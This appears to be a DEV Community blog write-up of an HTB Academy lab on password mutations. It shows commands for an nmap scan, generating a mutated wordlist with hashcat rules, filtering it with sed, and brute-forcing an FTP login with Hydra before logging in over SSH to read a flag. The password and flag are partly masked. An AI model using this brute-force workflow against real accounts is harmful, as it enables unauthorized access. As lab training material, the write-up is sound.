DEV Community

maz4l
maz4l

Posted on • Updated on

HTB Academy: Password Attacks Module - Password Mutations Section

Kali logo from MazalArt

Task

Create a mutated wordlist using the files in the ZIP file under "Resources." Use this wordlist to brute-force the password for the user "sam." Once successful, log in via SSH and submit the flag from flag.txt.

Steps:

  • Run Nmap Scan. Identify open ports and services on the target machine: ```bash

nmap -sV -Pn <$target_ip>

   Example output:
Enter fullscreen mode Exit fullscreen mode

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2


- **Create Password List and Custom Rule**.
   Using the files provided in the "Resources" section, create the `password.list` and `custom.rule`:
   ```bash


   sudo nano password.list
   sudo nano custom.rule


Enter fullscreen mode Exit fullscreen mode
  • Generate Mutated Wordlist. Use Hashcat to generate a mutated wordlist: ```bash

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
wc -l mut_password.list
93912 mut_password.list


- **Filter Mutated Wordlist**.
   Edit the mutated wordlist to filter passwords with a length of 11 or more characters, including at least one number, one letter, and one special symbol:
   ```bash


   sed -n '/^[[:alnum:][:punct:]]\{11,\}$/p' mut_password.list > mut_pass.list
   wc -l mut_pass.list
   36240  mut_pass.list



Enter fullscreen mode Exit fullscreen mode
  • Brute Force with Hydra. Use Hydra to find the password for the user "sam" on the FTP service: ```bash

hydra -l sam -P mut_pass.list ftp://<$target_ip> -t 48 -v

   Example successful output:
Enter fullscreen mode Exit fullscreen mode

[21][ftp] host: 10.129.x.xxx login: sam password: B@t********


- **Log in via SSH**.
   Connect to the target machine using the found credentials:
   ```bash


   ssh sam@<$target_ip>
   password: B@t********


Enter fullscreen mode Exit fullscreen mode
  • Find and Retrieve the Flag. Search for the flag file and read its contents: ```bash

find / -name "flag.txt" 2>/dev/null

   Example:
   ```bash


   /home/sam/smb/flag.txt
   cat /home/sam/smb/flag.txt


Enter fullscreen mode Exit fullscreen mode

The flag is:



   HTB{P4**_*********}


Enter fullscreen mode Exit fullscreen mode

This task demonstrated how to use password mutation rules to generate a custom wordlist and perform a brute-force attack to retrieve the flag.

Happy Hacking!

Top comments (0)